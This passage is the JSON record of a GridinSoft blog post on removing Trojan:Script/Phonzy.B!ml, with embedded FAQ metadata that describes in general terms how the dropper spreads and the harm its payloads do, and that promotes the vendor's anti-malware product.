activity.<\/p>\r\n\r\n\r\n\r\n<div class=\"machine-readable-metadata\" style=\"display:none;\">\r\n  <script type=\"application\/ld+json\">\r\n  {\r\n    \"@context\": \"https:\/\/schema.org\",\r\n    \"@type\": \"TechArticle\",\r\n    \"headline\": \"How to Remove Trojan:Script\/Phonzy.B!ml Malware\",\r\n    \"description\": \"Comprehensive guide on detecting and removing the dangerous Trojan:Script\/Phonzy.B!ml malware that acts as a dropper for banking trojans and other malicious payloads\",\r\n    \"keywords\": \"Trojan:Script\/Phonzy.B!ml, malware removal, dropper trojan, Microsoft Defender detection, banking trojans, USB infection, PowerShell malware\",\r\n    \"datePublished\": \"2024-02-15\",\r\n    \"dateModified\": \"2024-06-16\",\r\n    \"author\": {\r\n      \"@type\": \"Organization\",\r\n      \"name\": \"GridinSoft\"\r\n    },\r\n    \"publisher\": {\r\n      \"@type\": \"Organization\",\r\n      \"name\": \"GridinSoft\",\r\n      \"logo\": {\r\n        \"@type\": \"ImageObject\",\r\n        \"url\": \"https:\/\/gridinsoft.com\/wp-content\/uploads\/2021\/01\/gridinsoft-logo.png\"\r\n      }\r\n    },\r\n    \"about\": [\r\n      {\r\n        \"@type\": \"Thing\",\r\n        \"name\": \"Malware\",\r\n        \"description\": \"Software that is specifically designed to disrupt, damage, or gain unauthorized access to a computer system\",\r\n        \"sameAs\": \"https:\/\/en.wikipedia.org\/wiki\/Malware\"\r\n      }\r\n    ],\r\n    \"mentions\": [\r\n      {\r\n        \"@type\": \"SoftwareApplication\",\r\n        \"name\": \"GridinSoft Anti-Malware\",\r\n        \"applicationCategory\": \"SecurityApplication\",\r\n        \"operatingSystem\": \"Windows 7, Windows 8, Windows 10, Windows 11\",\r\n        \"url\": \"https:\/\/gridinsoft.com\/antimalware\",\r\n        \"offers\": {\r\n          \"@type\": \"Offer\",\r\n          \"price\": \"29.95\",\r\n          \"priceCurrency\": \"USD\",\r\n          \"availability\": \"https:\/\/schema.org\/InStock\"\r\n        },\r\n        \"aggregateRating\": {\r\n          \"@type\": \"AggregateRating\",\r\n          \"ratingValue\": \"4.8\",\r\n          \"ratingCount\": \"14867\"\r\n        }\r\n      }\r\n    ],\r\n    \"mainEntity\": {\r\n      \"@type\": \"FAQPage\",\r\n      \"mainEntity\": [\r\n        {\r\n          \"@type\": \"Question\",\r\n          \"name\": \"How does Trojan:Script\/Phonzy.B!ml infect systems?\",\r\n          \"acceptedAnswer\": {\r\n            \"@type\": \"Answer\",\r\n            \"text\": \"Trojan:Script\/Phonzy.B!ml typically infects systems through several methods, including phishing emails with malicious attachments, drive-by downloads from compromised websites, bundled software installations (especially cracked or pirated software), and infected USB drives. The initial infection usually involves a PowerShell or other script that downloads and executes the main Phonzy payload, which then contacts its command and control server for further instructions and additional malware downloads.\"\r\n          }\r\n        },\r\n        {\r\n          \"@type\": \"Question\",\r\n          \"name\": \"What damage can Phonzy.B!ml cause to my computer?\",\r\n          \"acceptedAnswer\": {\r\n            \"@type\": \"Answer\",\r\n            \"text\": \"While Phonzy.B!ml itself primarily functions as a dropper, the secondary payloads it delivers can cause extensive damage. Banking trojans commonly delivered by Phonzy can steal financial credentials, leading to unauthorized transactions and identity theft. Other potential payloads include ransomware that encrypts your files, cryptominers that consume system resources, and backdoors that provide attackers with persistent access to your system. Additionally, the system reconnaissance performed by Phonzy compromises your privacy by collecting and transmitting sensitive information about your computer and browsing habits.\"\r\n          }\r\n        },\r\n        {\r\n          \"@type\": \"Question\",\r\n          \"name\": \"Why does Microsoft Defender label this threat with '!ml' in its name?\",\r\n          \"acceptedAnswer\": {\r\n            \"@type\": \"Answer\",\r\n            \"text\": \"The '!ml' suffix in Microsoft Defender detection names indicates that the threat was identified using machine learning algorithms rather than traditional signature-based detection. This approach allows Microsoft to detect previously unseen malware variants based on behavioral similarities to known threats. While machine learning detection provides excellent protection against emerging threats, it occasionally results in false positives. When you see the '!ml' designation, it's advisable to verify the detection using a specialized anti-malware tool like GridinSoft Anti-Malware, which employs multiple detection techniques to provide more definitive results.\"\r\n          }\r\n        },\r\n        {\r\n          \"@type\": \"Question\",\r\n          \"name\": \"Can Phonzy.B!ml steal my banking credentials?\",\r\n          \"acceptedAnswer\": {\r\n            \"@type\": \"Answer\",\r\n            \"text\": \"Phonzy.B!ml itself doesn't directly steal banking credentials, but it frequently downloads and installs banking trojans specifically designed for this purpose. These secondary payloads employ various techniques to capture financial information, including keylogging (recording keystrokes), form grabbing (capturing data entered into web forms), screen capturing during banking sessions, and web injection (inserting malicious code into banking websites to harvest credentials). To protect your financial information after a Phonzy infection, you should completely remove all malware, reset your browsers, change passwords for all financial accounts using a clean device, and monitor your accounts for unauthorized activity.\"\r\n          }\r\n        }\r\n      ]\r\n    },\r\n    \"educationalUse\": \"Removal Guide\"\r\n  }\r\n  <\/script>\r\n<\/div>\r\n\r\n\r\n\r\n","protected":false},"excerpt":{"rendered":"<p>Trojan:Script\/Phonzy.B!ml is a generic detection name used by Microsoft Defender for a dangerous loader malware. This threat primarily functions as a dropper, downloading and executing additional malicious payloads onto infected systems. In numerous documented infection cases, Phonzy trojan has been observed delivering banking trojans designed to steal financial credentials. Attribute Details Threat Name Trojan:Script\/Phonzy.B!ml Type [&hellip;]<\/p>\n","protected":false},"author":7,"featured_media":20062,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"content-type":"","_sitemap_exclude":false,"_sitemap_priority":"","_sitemap_frequency":"","footnotes":""},"categories":[17],"tags":[456,540,24,223],"class_list":{"0":"post-19960","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-labs","8":"tag-malware-removal","9":"tag-script-based","10":"tag-trojan","11":"tag-windows-defender"},"featured_image_src":"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/02\/phonzy-bml-featured.webp","author_info":{"display_name":"Stephanie Adlam","author_link":"https:\/\/gridinsoft.com\/blogs\/author\/adlam\/"},"_links":{"self":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/19960","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/comments?post=19960"}],"version-history":[{"count":28,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/19960\/revisions"}],"predecessor-version":[{"id":30530,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/19960\/revisions\/30530"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/media\/20062"}],"wp:attachment":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/media?parent=19960"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/categories?post=19960"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/tags?post=19960"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}